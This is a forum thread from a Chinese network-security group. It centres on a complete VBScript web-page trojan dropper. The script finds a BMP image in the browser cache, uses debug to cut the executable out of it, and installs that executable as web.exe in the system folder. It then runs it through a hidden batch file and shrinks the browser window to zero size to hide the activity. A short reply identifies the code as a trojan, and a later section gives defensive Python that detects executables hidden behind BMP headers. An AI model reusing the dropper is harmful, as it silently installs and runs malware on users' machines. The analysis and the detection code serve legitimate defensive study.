Author: cg2327 [cg2327]

```html
<SCRIPT LANGUAGE="VBScript">
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
' Locate the browser cache folder from the registry
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
sucess=0
SearchBMPFile fso.GetFolder(CACHE),"web[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"web[2].bmp"

' Recursively search the cache for the named .bmp file
Function SearchBMPFile(Folder,fname)
  Dim SubFolder,File,Lt,tmp,winsys
  str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname');
  if FSO.FileExists(str) then
    tmp=fso.GetSpecialFolder(2) & "\"     ' temporary folder
    winsys=fso.GetSpecialFolder(1) & "\"  ' system folder
    set File=FSO.GetFile(str)
    File.Copy(tmp & "tmp.dat")
    On Error Resume Next
    File.Delete
    if FSO.FileExists(str) then exit function
    ' debug script: set BX:CX (byte count) to 0x29D9, write from offset 0x136, quit
    set Lt=FSO.CreateTextFile(tmp & "tmp.in")
    Lt.WriteLine("rbx")
    Lt.WriteLine("0")
    Lt.WriteLine("rcx")
    Lt.WriteLine("29D9")
    Lt.WriteLine("w136")
    Lt.WriteLine("q")
    Lt.Close
    ' Batch file: run debug on tmp.dat, copy the result to web.exe in the system folder, clean up, run it
    set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
    Lt.WriteLine("@echo off")
    Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
    Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "web.exe>" & tmp & "tmp.out")
    Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
    Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
    Lt.WriteLine(winsys & "web.exe")
    Lt.Close
    WSH.Run tmp & "tmp.bat",false,6
    On Error Resume Next
    'FSO.GetFile(tmp & "tmp.bat").Delete
    sucess=1
  end if
  If Folder.SubFolders.Count <> 0 Then
    For Each SubFolder In Folder.SubFolders
      SearchBMPFile SubFolder,fname
    Next
  End If
End Function
window.close
</script>
<SCRIPT language=JavaScript>
// Move the window to the screen corner and shrink it to zero size
parent.moveTo(0,0);
parent.resizeTo(0,0);
</SCRIPT>
```

Original poster, posted: 04-07-03 01:05

Reply: Frankiez [frankiez84]

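I didn't look closely, but from a few details I'd tentatively call it a web page trojan: it uses debug to extract the trojan body from an image file that was downloaded into the temporary Internet files folder.
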
Floor B1, posted: 04-07-03 08:00
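
For triage of cached images, the layout the reply describes can be checked directly. This is an added example, not code from the thread: `w136` in the posted debug script writes from offset 0x136, which is 0x36 bytes past debug's 0x100 load offset, the length of a standard BMP header. The check assumes the body behind the header is an MZ executable (the script runs it as `web.exe`); the function names and sample bytes are constructed for illustration.

```python
import struct

# 14-byte BMP file header + 40-byte BITMAPINFOHEADER = 0x36 bytes.
# debug loads a data file at offset 0x100, so "w136" starts right after it.
BMP_HEADER_LEN = 0x36


def inspect_cached_bmp(data: bytes) -> dict:
    """Report whether an executable begins right after the BMP header."""
    result = {"is_bmp": False, "mz_after_header": False,
              "pe_header": False, "payload_len": 0}
    if len(data) < BMP_HEADER_LEN or data[:2] != b"BM":
        return result
    result["is_bmp"] = True
    payload = data[BMP_HEADER_LEN:]
    result["payload_len"] = len(payload)
    if payload[:2] != b"MZ":          # assumption: body is a DOS/PE executable
        return result
    result["mz_after_header"] = True
    if len(payload) >= 0x40:
        # e_lfanew (offset 0x3C of the DOS header) points at "PE\0\0"
        (e_lfanew,) = struct.unpack_from("<I", payload, 0x3C)
        result["pe_header"] = payload[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return result


def make_bmp(body: bytes) -> bytes:
    """Build a constructed 1x1 24-bit BMP header followed by `body`."""
    file_hdr = struct.pack("<2sIHHI", b"BM", BMP_HEADER_LEN + len(body),
                           0, 0, BMP_HEADER_LEN)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, 1, 1, 1, 24, 0, 0, 0, 0, 0, 0)
    return file_hdr + info_hdr + body


# Constructed samples: a plain image and a header-plus-executable carrier.
BENIGN_BMP = make_bmp(b"\xff\xff\xff\x00")
FAKE_EXE = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
            + b"PE\0\0" + b"\0" * 16)
CARRIER_BMP = make_bmp(FAKE_EXE)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_BMP), ("carrier", CARRIER_BMP)):
        print(name, inspect_cached_bmp(blob))
```
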
All rights reserved by the 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.